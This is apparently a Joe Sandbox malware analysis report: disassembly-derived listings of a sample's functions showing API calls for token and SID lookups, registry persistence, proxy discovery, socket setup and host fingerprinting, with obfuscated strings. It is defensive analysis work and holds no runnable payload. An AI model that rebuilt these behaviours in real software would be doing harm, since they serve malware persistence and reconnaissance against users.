GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
HeapAlloc.KERNEL32(00000000), ref: 0040495B
GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
HeapAlloc.KERNEL32(00000000), ref: 00404A0F
GetCursor.USER32 ref: 00404A20
wsprintfW.USER32 ref: 00404A53
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
HeapFree.KERNEL32(00000000), ref: 00404A75
GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
HeapFree.KERNEL32(00000000), ref: 00404A7F
CloseHandle.KERNEL32(00000000), ref: 00404A84
CloseHandle.KERNEL32(?), ref: 00404A8D
GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
HeapFree.KERNEL32(00000000), ref: 00404A9E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
HeapFree.KERNEL32(00000000), ref: 00404AA6

Strings

t), xrefs: 004049DB
8'Z, xrefs: 004049B9
8tZLY, xrefs: 00404A36
L, xrefs: 004049E1
8QZ?, xrefs: 004049E8
Z, xrefs: 004049FD
L=8t, xrefs: 004049F6
Lc8(, xrefs: 004049CD
Ni, xrefs: 00404A26

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004035A5, Relevance: 61.5, APIs: 32, Strings: 3, Instructions: 292

APIs

WinHttpGetIEProxyConfigForCurrentUser.WINHTTP(?,00000000,?,00000000), ref: 004035E0
WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000), ref: 0040361F
WinHttpGetProxyForUrl.WINHTTP(00000000,?,00000000,?), ref: 00403677
StrCpyW.SHLWAPI(?,00000000), ref: 0040368D
WinHttpCloseHandle.WINHTTP(00000000), ref: 00403694
GlobalFree.KERNEL32(00000000), ref: 004036A9
GlobalFree.KERNEL32(00000000), ref: 004036B8
WinHttpCloseHandle.WINHTTP(00000000), ref: 004036C0
GlobalFree.KERNEL32(00000000), ref: 004036D5
GlobalFree.KERNEL32(00000000), ref: 004036E0
PathMatchSpecW.SHLWAPI(?,00000000), ref: 004036FD
StrCpyW.SHLWAPI(?,00000000), ref: 0040372D
GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040376A
HeapAlloc.KERNEL32(00000000), ref: 0040376D
GetDoubleClickTime.USER32 ref: 0040378B
GetProcessHeap.KERNEL32(00000008,00000019), ref: 004037E0
HeapAlloc.KERNEL32(00000000), ref: 004037E3
GetCurrentThreadId.KERNEL32 ref: 004037F7
StrStrIW.SHLWAPI(?,?), ref: 00403824
StrStrIW.SHLWAPI(00000000,00000000), ref: 0040384C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403886
HeapFree.KERNEL32(00000000), ref: 0040388F
GetProcessHeap.KERNEL32(00000000,?), ref: 00403894
HeapFree.KERNEL32(00000000), ref: 00403897
GlobalFree.KERNEL32(00000000), ref: 004038AA
GlobalFree.KERNEL32(?), ref: 004038B4
GlobalFree.KERNEL32(00000000), ref: 004038BF
StrCpyW.SHLWAPI(?,-00000002), ref: 004038D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004038DA
HeapFree.KERNEL32(00000000), ref: 004038E7
GetProcessHeap.KERNEL32(00000000,?), ref: 004038EC
HeapFree.KERNEL32(00000000), ref: 004038F3

Part of subcall function 00403551: WinHttpCrackUrl.WINHTTP(?,?,00000000,0000003C,?,00000208), ref: 00403593

Strings

4Ac85L, xrefs: 004037A2
4A, xrefs: 00403757
Z2w, xrefs: 004037C5

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00403E17, Relevance: 61.5, APIs: 28, Strings: 7, Instructions: 264

APIs

GetProcessHeap.KERNEL32(00000008,00000208,0041CAA8), ref: 00403E3F
HeapAlloc.KERNEL32(00000000), ref: 00403E42

Part of subcall function 00403950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00403971
Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 004039B0
Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 004039B7
Part of subcall function 00403950: GetCurrentProcessId.KERNEL32 ref: 004039C8
Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00403A72
Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 00403A79
Part of subcall function 00403950: GetForegroundWindow.USER32 ref: 00403A8A
Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403AC8
Part of subcall function 00403950: HeapFree.KERNEL32(00000000), ref: 00403ACF

Part of subcall function 004038F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0040131B,00000000,0040131B,00000000,00000001,?,0040131B,00020006), ref: 00403929
Part of subcall function 004038F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0040131B,0040131B,?,0040131B,00020006), ref: 0040393C

GetProcessHeap.KERNEL32(00000008,00000039,00020019), ref: 00403ED2
HeapAlloc.KERNEL32(00000000), ref: 00403ED9
GetTickCount.KERNEL32 ref: 00403EED
wsprintfW.USER32 ref: 00403F24
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403F6E
HeapAlloc.KERNEL32(00000000), ref: 00403F71
GetCaretBlinkTime.USER32 ref: 00403F86
wsprintfW.USER32 ref: 00403FC8
RegQueryValueExW.ADVAPI32(00000000,?,00000000,00000003,00000000,?,00020019), ref: 0040401D
GetProcessHeap.KERNEL32(00000008,?), ref: 0040402C
HeapAlloc.KERNEL32(00000000), ref: 0040402F
RegQueryValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00404051
RegCloseKey.ADVAPI32(?), ref: 00404077
GetProcessHeap.KERNEL32(00000008,?), ref: 00404099
HeapAlloc.KERNEL32(00000000), ref: 0040409C
GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 004040AE
HeapReAlloc.KERNEL32(00000000), ref: 004040B1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004040D5
HeapFree.KERNEL32(00000000), ref: 004040D8
GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 004040E4
HeapFree.KERNEL32(00000000), ref: 004040ED
RegCloseKey.ADVAPI32(?), ref: 004040FC
GetProcessHeap.KERNEL32(00000000,?), ref: 00404107
HeapFree.KERNEL32(00000000), ref: 0040410A
GetProcessHeap.KERNEL32(00000000,00000000,00020019), ref: 00404112
HeapFree.KERNEL32(00000000), ref: 00404115

Strings

\4@, xrefs: 00403F19
5K Y[W*I+5.K, xrefs: 00403EE3
2KlY, xrefs: 00403EB9
*I>5, xrefs: 00403EB2
68oLRM, xrefs: 00403FA3
WKIY5, xrefs: 00403F0A
QWKI, xrefs: 00403EC0

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00407C11, Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 374

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000002), ref: 00407C57
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407C5A
GetShellWindow.USER32 ref: 00407C6F
GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407CF0
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407CF3
GetProcessWindowStation.USER32 ref: 00407D08
GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D47
GetProcAddress.KERNEL32(00000000,00000000,?,00000002), ref: 00407D70
GetModuleHandleA.KERNEL32(?,?,00000002), ref: 00407D86
GetProcessHeap.KERNEL32(00000008,00000022,?,00000002), ref: 00407DED
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407DF0
GetProcessWindowStation.USER32 ref: 00407E02
GetProcAddress.KERNEL32(00000000,?,00000002), ref: 00407E31
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00407E3F
HeapFree.KERNEL32(00000000,?,00000002), ref: 00407E42

Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0040752D
Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 00407530
Part of subcall function 004074D8: GetMessageTime.USER32 ref: 00407544
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040759E
Part of subcall function 004074D8: HeapAlloc.KERNEL32(00000000), ref: 004075A1
Part of subcall function 004074D8: IsSystemResumeAutomatic.KERNEL32 ref: 004075B5
Part of subcall function 004074D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 004075E6
Part of subcall function 004074D8: GetProcAddress.KERNEL32(00000000), ref: 004075ED
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407601
Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 0040760A
Part of subcall function 004074D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040760F
Part of subcall function 004074D8: HeapFree.KERNEL32(00000000), ref: 00407612
Part of subcall function 004074D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0040762E
Part of subcall function 004074D8: CloseHandle.KERNEL32(00000000), ref: 0040764D

GetProcessHeap.KERNEL32(00000008,00000200,?,00000002), ref: 00407E89
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407E8C
GetProcessHeap.KERNEL32(00000008,00000100,?,00000002), ref: 00407EA4
HeapAlloc.KERNEL32(00000000,?,00000002), ref: 00407EA7
HeapFree.KERNEL32(00000000,?,00000002), ref: 00408082

Part of subcall function 00407A57: GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00407A81
Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00407AC1
Part of subcall function 00407A57: HeapAlloc.KERNEL32(00000000), ref: 00407AC8
Part of subcall function 00407A57: GetShellWindow.USER32 ref: 00407ADF
Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00407B50
Part of subcall function 00407A57: HeapAlloc.KERNEL32(00000000), ref: 00407B57
Part of subcall function 00407A57: DestroyCaret.USER32 ref: 00407B6D
Part of subcall function 00407A57: GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00407B9E
Part of subcall function 00407A57: GetProcAddress.KERNEL32(00000000), ref: 00407BA5
Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BB4
Part of subcall function 00407A57: HeapFree.KERNEL32(00000000), ref: 00407BC1
Part of subcall function 00407A57: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BC5
Part of subcall function 00407A57: HeapFree.KERNEL32(00000000), ref: 00407BCC
Part of subcall function 00407A57: CloseHandle.KERNEL32(00000002), ref: 00407C02

GetProcessHeap.KERNEL32(00000000,76E6FE8D,?,00000002), ref: 00408065
HeapFree.KERNEL32(00000000,?,00000002), ref: 0040806C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 0040807F
GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 004080B5
HeapFree.KERNEL32(00000000,?,00000002), ref: 004080BE
GetProcessHeap.KERNEL32(00000000,?,?,00000002), ref: 004080C3
HeapFree.KERNEL32(00000000,?,00000002), ref: 004080C6

Strings

EpvAqf, xrefs: 0040809F, 00407F6F
'5, xrefs: 00407C46
[##', xrefs: 00407C38
5WGK5, xrefs: 00407C8C

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00403ADC, Relevance: 54.5, APIs: 25, Strings: 6, Instructions: 252

APIs

GetProcessHeap.KERNEL32(00000008,00000208,00000000), ref: 00403B01
HeapAlloc.KERNEL32(00000000), ref: 00403B04

Part of subcall function 00403950: GetVersion.KERNEL32(76E6FE8D,00000000,?), ref: 00403971
Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000025), ref: 004039B0
Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 004039B7
Part of subcall function 00403950: GetCurrentProcessId.KERNEL32 ref: 004039C8
Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000008,00000051), ref: 00403A72
Part of subcall function 00403950: HeapAlloc.KERNEL32(00000000), ref: 00403A79
Part of subcall function 00403950: GetForegroundWindow.USER32 ref: 00403A8A
Part of subcall function 00403950: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403AC8
Part of subcall function 00403950: HeapFree.KERNEL32(00000000), ref: 00403ACF

Part of subcall function 004038F7: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,0040131B,00000000,0040131B,00000000,00000001,?,0040131B,00020006), ref: 00403929
Part of subcall function 004038F7: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,0040131B,0040131B,?,0040131B,00020006), ref: 0040393C

GetProcessHeap.KERNEL32(00000008,00000039,00020006), ref: 00403BC8
HeapAlloc.KERNEL32(00000000), ref: 00403BCB
GetTickCount.KERNEL32 ref: 00403BDF
wsprintfW.USER32 ref: 00403C16
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403C56
HeapAlloc.KERNEL32(00000000), ref: 00403C59
GetCaretBlinkTime.USER32 ref: 00403C6D
wsprintfW.USER32 ref: 00403CB2
RegDeleteValueW.ADVAPI32(?,?), ref: 00403CC5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403CD4
HeapFree.KERNEL32(00000000), ref: 00403CD7
GetProcessHeap.KERNEL32(00000008,00000019), ref: 00403D22
HeapAlloc.KERNEL32(00000000), ref: 00403D25
GetCaretBlinkTime.USER32 ref: 00403D39
wsprintfW.USER32 ref: 00403D7E
RegSetValueExW.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 00403DAE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00403DC6
HeapFree.KERNEL32(00000000), ref: 00403DC9
RegCloseKey.ADVAPI32(?), ref: 00403DEA
GetProcessHeap.KERNEL32(00000000,?), ref: 00403DF5
HeapFree.KERNEL32(00000000), ref: 00403DF8
GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00403E04
HeapFree.KERNEL32(00000000), ref: 00403E07

Strings

WKIY5, xrefs: 00403BFC
*I>5, xrefs: 00403B8F
2KlY, xrefs: 00403B96
QWKI, xrefs: 00403BB2
68oLRM, xrefs: 00403C83
5K Y[W*I+5.K, xrefs: 00403BD5

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040D076, Relevance: 47.5, APIs: 17, Strings: 10, Instructions: 225

APIs

GetProcessHeap.KERNEL32(00000008,00000029,00000000,76E6C426,00000000), ref: 0040D0F6
HeapAlloc.KERNEL32(00000000), ref: 0040D0FD
GetCapture.USER32 ref: 0040D10F
WSAStartup.WS2_32(00000201,?), ref: 0040D147
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040D1F5
HeapAlloc.KERNEL32(00000000), ref: 0040D1FC
GetCurrentThreadId.KERNEL32 ref: 0040D20E
wsprintfA.USER32 ref: 0040D241
Sleep.KERNEL32(-0000EA60,00000000,?,00000000,00000000), ref: 0040D2A1
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D2CF
HeapFree.KERNEL32(00000000), ref: 0040D2D6

Part of subcall function 004047D4: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 004047F4
Part of subcall function 004047D4: HeapFree.KERNEL32(00000000), ref: 004047F7
Part of subcall function 004047D4: GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 00404801
Part of subcall function 004047D4: HeapAlloc.KERNEL32(00000000), ref: 00404804

Part of subcall function 0040482B: GetProcessHeap.KERNEL32(00000000,?,?,00000000,0040318E,00000000,?,00000000,0040D266,?,00000001,00000000,76E6C570,?,?,0040D266), ref: 00404845
Part of subcall function 0040482B: HeapFree.KERNEL32(00000000,?,0040D266), ref: 0040484C

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D310
HeapFree.KERNEL32(00000000), ref: 0040D317
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 0040D326
HeapFree.KERNEL32(00000000), ref: 0040D32D
GetProcessHeap.KERNEL32(00000000,0040D3F2), ref: 0040D33E
HeapFree.KERNEL32(00000000), ref: 0040D345

Strings

w_, xrefs: 0040D0E1
3hc0, xrefs: 0040D0CC
WhfZ7r, xrefs: 0040D224
3h, xrefs: 0040D1E2
IFNoT, xrefs: 0040D12C
e{uz, xrefs: 0040D0D3
Zb~~, xrefs: 0040D0DA
1/!&, xrefs: 0040D0A3
T, xrefs: 0040D0E7
>"*#, xrefs: 0040D0B0

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040E310, Relevance: 47.4, APIs: 20, Strings: 7, Instructions: 199

APIs

RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,0040E7ED,?), ref: 0040E39F
GetProcessHeap.KERNEL32(00000008,000000C8,774229EE,76E6FE8D), ref: 0040E3B7
HeapAlloc.KERNEL32(00000000), ref: 0040E3BE
RegQueryValueExA.ADVAPI32(0040E7ED,?,00000000,00000000,00000000,?), ref: 0040E3EB
RegQueryValueExA.ADVAPI32(0040E7ED,74736E49,00000000,00000000,?,00000004), ref: 0040E411
RegQueryValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000000,?,00000004), ref: 0040E43F
GetTickCount.KERNEL32 ref: 0040E445
RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E451
RegOpenKeyExA.ADVAPI32(80000002,?,00000000,0004001F,0040E7ED), ref: 0040E467
RegSetValueExA.ADVAPI32(0040E7ED,49676552,00000000,00000004,?,00000004), ref: 0040E482
RegCloseKey.ADVAPI32(0040E7ED), ref: 0040E499
lstrlenA.KERNEL32(00000008), ref: 0040E4A5
GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E4CB
HeapAlloc.KERNEL32(00000000), ref: 0040E4D2
GetComputerNameA.KERNEL32(00000000,00000004), ref: 0040E4DF
lstrlenA.KERNEL32(00000000), ref: 0040E4E6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E503
HeapFree.KERNEL32(00000000), ref: 0040E510
GetProcessHeap.KERNEL32(00000000,?), ref: 0040E517
HeapFree.KERNEL32(00000000), ref: 0040E51E

Strings

sion, xrefs: 0040E33D
ate, xrefs: 0040E382
rren, xrefs: 0040E328
RegI, xrefs: 0040E389
allD, xrefs: 0040E37B
tVer, xrefs: 0040E333
Inst, xrefs: 0040E374

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00407A57, Relevance: 42.1, APIs: 14, Strings: 10, Instructions: 138

APIs

GetCurrentProcessId.KERNEL32(00000000,?,00000000), ref: 00407A81
GetProcessHeap.KERNEL32(00000008,0000000B,00000000,?,00000000), ref: 00407AC1
HeapAlloc.KERNEL32(00000000), ref: 00407AC8
GetShellWindow.USER32 ref: 00407ADF
GetProcessHeap.KERNEL32(00000008,0000001C), ref: 00407B50
HeapAlloc.KERNEL32(00000000), ref: 00407B57
DestroyCaret.USER32 ref: 00407B6D
GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00407B9E
GetProcAddress.KERNEL32(00000000), ref: 00407BA5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BB4
HeapFree.KERNEL32(00000000), ref: 00407BC1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407BC5
HeapFree.KERNEL32(00000000), ref: 00407BCC
CloseHandle.KERNEL32(00000002), ref: 00407C02

Strings

Ks, xrefs: 00407B4A
\G, xrefs: 00407B39
<E^!, xrefs: 00407B16
N, xrefs: 00407B3F
jsN8, xrefs: 00407B43
'5, xrefs: 00407AB0
+Y/%, xrefs: 00407B1D
#W9, xrefs: 00407B32
z-., xrefs: 00407B73
[##', xrefs: 00407AA2

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00408761, Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 141

APIs

GetProcessHeap.KERNEL32(00000008,00000015,00000000,?,?), ref: 00408799
HeapAlloc.KERNEL32(00000000), ref: 0040879C
GetTickCount.KERNEL32 ref: 004087B8
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00408804
HeapAlloc.KERNEL32(00000000), ref: 00408807
GetCapture.USER32 ref: 00408819
GetProcessHeap.KERNEL32(00000008,0000000F), ref: 0040886A
HeapAlloc.KERNEL32(00000000), ref: 00408871
GetCursor.USER32 ref: 00408885
LoadLibraryA.KERNEL32(66713859), ref: 004088B6
GetProcAddress.KERNEL32(00000000), ref: 004088BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004088DF
HeapFree.KERNEL32(00000000), ref: 004088EC
GetProcessHeap.KERNEL32(00000000,66713859), ref: 004088F7
HeapFree.KERNEL32(00000000), ref: 004088FA
GetProcessHeap.KERNEL32(00000000,?), ref: 00408901
HeapFree.KERNEL32(00000000), ref: 00408904

Strings

&("(, xrefs: 00408849
Y8qf, xrefs: 0040878E
ZMyL, xrefs: 0040885D
Hiyn, xrefs: 004087F9
Y$i, xrefs: 004087F2

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00424851, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134

APIs

Part of subcall function 0042120D: EncodePointer.KERNEL32(00000000,00424877,00435AB0,00000314,00000000,?,?,?,?,?,00420961,00435AB0,Microsoft Visual C++ Runtime Library,00012010), ref: 0042120F

LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042488C
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 004248A8
EncodePointer.KERNEL32(00000000), ref: 004248B9
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004248C6
EncodePointer.KERNEL32(00000000), ref: 004248C9
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004248D6
EncodePointer.KERNEL32(00000000), ref: 004248D9
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 004248E6
EncodePointer.KERNEL32(00000000), ref: 004248E9
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004248FA
EncodePointer.KERNEL32(00000000), ref: 004248FD
DecodePointer.KERNEL32(00000000,00435AB0,00000314,00000000), ref: 0042491F
DecodePointer.KERNEL32 ref: 00424929
DecodePointer.KERNEL32(?,00435AB0,00000314,00000000), ref: 00424968
DecodePointer.KERNEL32(?), ref: 00424982
DecodePointer.KERNEL32(00435AB0,00000314,00000000), ref: 00424996

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

GetActiveWindow, xrefs: 004248BB
GetLastActivePopup, xrefs: 004248CB
MessageBoxW, xrefs: 004248A2
USER32.DLL, xrefs: 00424887
GetProcessWindowStation, xrefs: 004248F4
GetUserObjectInformationW, xrefs: 004248DB

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00404521, Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 116

APIs

GetModuleHandleW.KERNEL32(00000000,7142434B,001CFDA8,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040453A
GetCurrentProcess.KERNEL32(00000008,004019F5,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404546
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 0040454D
GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 00404570
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404572
GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,004019F5,76AD46E9,76E6FE8D), ref: 00404587
GetTokenInformation.ADVAPI32(004019F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,004019F5), ref: 004045A7
ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 004045B7
GetProcessHeap.KERNEL32(00000008,00000025), ref: 00404601
HeapAlloc.KERNEL32(00000000), ref: 00404608
GetCapture.USER32 ref: 00404617
StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00404647
LocalFree.KERNEL32(76AD46E9), ref: 0040465B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404664
HeapFree.KERNEL32(00000000), ref: 0040466B
GlobalFree.KERNEL32(00000000), ref: 00404675
CloseHandle.KERNEL32(004019F5), ref: 0040467F

Strings

lAww, xrefs: 004045E0
+TtA, xrefs: 004045D2
kwUT, xrefs: 004045D9
xTYA, xrefs: 004045F4
ITaA, xrefs: 004045E7

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040FCD2, Relevance: 36.9, APIs: 13, Strings: 8, Instructions: 124

APIs

GetProcessHeap.KERNEL32(00000008,0000004D,00412000,7142434B,001CFDA8), ref: 0040FD46
HeapAlloc.KERNEL32(00000000), ref: 0040FD49
GetDialogBaseUnits.USER32 ref: 0040FD64
RegOpenKeyExW.ADVAPI32(?,00000000,00000000,000F003F,00000000), ref: 0040FD98
GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0040FDFD
HeapAlloc.KERNEL32(00000000), ref: 0040FE00
CloseClipboard.USER32 ref: 0040FE14
RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,?,00000004), ref: 0040FE47
RegCloseKey.ADVAPI32(00000000), ref: 0040FE50
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE5F
HeapFree.KERNEL32(00000000), ref: 0040FE62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FE6E
HeapFree.KERNEL32(00000000), ref: 0040FE71

Strings

^o&c, xrefs: 0040FD17
%r?7, xrefs: 0040FDB3
:jXo, xrefs: 0040FD1E
frK7, xrefs: 0040FDF0
?6r, xrefs: 0040FDBA
6c'j, xrefs: 0040FD25
Qo1c, xrefs: 0040FD2C
#c<j, xrefs: 0040FCFB

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040EA7F, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 162

APIs

GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 0040EB13
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040EB16
GetTickCount.KERNEL32(?,00000000), ref: 0040EB2B
GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000), ref: 0040EB76
HeapAlloc.KERNEL32(00000000,?,00000000), ref: 0040EB79
